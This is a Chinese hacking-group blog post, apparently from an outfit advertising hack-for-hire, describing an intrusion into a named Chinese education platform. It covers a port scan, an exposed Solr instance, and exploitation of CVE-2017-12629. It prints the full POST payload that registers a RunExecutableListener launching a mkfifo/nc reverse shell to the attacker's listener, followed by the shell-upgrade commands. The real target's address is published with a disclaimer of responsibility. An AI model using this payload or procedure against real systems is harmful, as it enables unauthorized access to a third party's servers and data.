网站入侵

网站入侵,入侵渗透,怎么样入侵网站,黑客怎么拿站,黑客接单

入侵某国内教育平台数据库

                       

黑客19 – 引领实战潮流,回归技术本质,以行动推动行业技术进步
唯一的联系方式[email protected] 和 [email protected]
欢迎转载,但请注明原始链接,谢谢!

目标地址 http://www.nbsedu.com/

因为漏洞已经提示商家修复,所以这里给出了目标链接。请不要尝试太多,我们不会对任何法律责任负责.

怎样才能好好听课?…盘他!

先nmap扫描一波全端口

注意要加-p 1-65535 nmap扫描所有端口。

果然,21000端口有点东西

打开康康

中奖了。solr是Apache Lucene该项目的开源企业搜索平台出现了许多漏洞。直觉告诉我突破点!

搜索后,我选择了CVE-2017-12629,这是一个XXE漏洞,对7.1之前的solr有效,可直接Getshell

首先看看这里部署了什么

(红框是部署项目)

emmm,看disk那亮眼,就选你吧

先做好准备,先打开内网穿透(这里用frp)

然后执行 nc -l -p 监控端口 -vv

监听

首先访问?XXX.com:21000/solr/disk/config页面?

设置burp代理,抓包!

魔改

POST数据如下:

           "create-listener": "event":"postCommit", "name": "shell", "class":"solr.RunExecutableListener", "exe": "sh", "dir": "/bin/", "args": ["-c","rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 我的ip 监听端口 > /tmp/f"]

然后访问XXX.com:21000/solr/disk/update?更新配置
再次访问XXX.com:21000/solr/disk/config,就添加了shell这个listener,post数据中的args这是我们执行的命令,这是反弹shell

稍等片刻,shell就弹回来了

但这是哑shell,不支持命令补充和高亮代码
先在哑shell中执行

python -c 'import pty; pty.spawn("/bin/bash")'

ctrl z退出,在终端中执行

stty raw -echo

绕后输入fg回到shell
分别执行

resetexport SHELL=bashexport TERM=xterm-256colorstty rows 54 columns 104

我们得到了一个功能齐全的人shell,代码亮,命令补充,甚至终端上烦人的哔哔声都有

可惜shell权限很小,甚至执行exp没有权限。下一步只能研究如何提高权利。

这个渗透教程到此结束!希望大家看看借鉴。如果您有技术咨询,请联系我们
黑客19引领实战潮流,回归技术本质,以行动推动行业技术进步
唯一的联系方式[email protected] 和 [email protected]
欢迎转载,但请注明原始链接,谢谢!

       

发表评论:

Powered By

Copyright Your WebSite.Some Rights Reserved.